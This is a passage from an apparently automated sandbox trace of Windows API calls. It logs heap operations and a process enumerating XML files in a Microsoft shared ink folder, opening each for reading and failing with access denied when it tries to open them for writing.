hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.440] AreFileApisANSI () returned 1 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", lpUsedDefaultChar=0x0) returned 62 [0084.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.441] AreFileApisANSI () returned 1 [0084.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0084.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 62 [0084.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.441] GetFileType (hFile=0x364) returned 0x1 [0084.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0084.441] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.441] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.442] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.442] CloseHandle (hObject=0x364) returned 1 [0084.442] AreFileApisANSI () returned 1 [0084.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0084.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml") returned 62 [0084.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.442] GetLastError () returned 0x5 [0084.442] GetLastError () returned 0x5 [0084.442] SetLastError (dwErrCode=0x5) [0084.442] GetLastError () returned 0x5 [0084.442] SetLastError (dwErrCode=0x5) [0084.442] GetLastError () returned 0x5 [0084.442] SetLastError (dwErrCode=0x5) [0084.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0084.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0084.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.443] AreFileApisANSI () returned 1 [0084.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", lpUsedDefaultChar=0x0) returned 62 [0084.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.444] AreFileApisANSI () returned 1 [0084.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0084.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 62 [0084.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.444] GetFileType (hFile=0x364) returned 0x1 [0084.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.444] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.444] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.445] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.445] CloseHandle (hObject=0x364) returned 1 [0084.445] AreFileApisANSI () returned 1 [0084.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 62 [0084.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.445] GetLastError () returned 0x5 [0084.445] GetLastError () returned 0x5 [0084.445] SetLastError (dwErrCode=0x5) [0084.445] GetLastError () returned 0x5 [0084.445] SetLastError (dwErrCode=0x5) [0084.446] GetLastError () returned 0x5 [0084.446] SetLastError (dwErrCode=0x5) [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.446] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0084.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0084.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0084.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.447] AreFileApisANSI () returned 1 [0084.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", lpUsedDefaultChar=0x0) returned 62 [0084.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.447] AreFileApisANSI () returned 1 [0084.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0084.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 62 [0084.447] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.447] GetFileType (hFile=0x364) returned 0x1 [0084.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0084.448] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.448] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.448] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.448] CloseHandle (hObject=0x364) returned 1 [0084.448] AreFileApisANSI () returned 1 [0084.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e250 [0084.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 62 [0084.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.448] GetLastError () returned 0x5 [0084.449] GetLastError () returned 0x5 [0084.449] SetLastError (dwErrCode=0x5) [0084.449] GetLastError () returned 0x5 [0084.449] SetLastError (dwErrCode=0x5) [0084.449] GetLastError () returned 0x5 [0084.449] SetLastError (dwErrCode=0x5) [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.449] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: 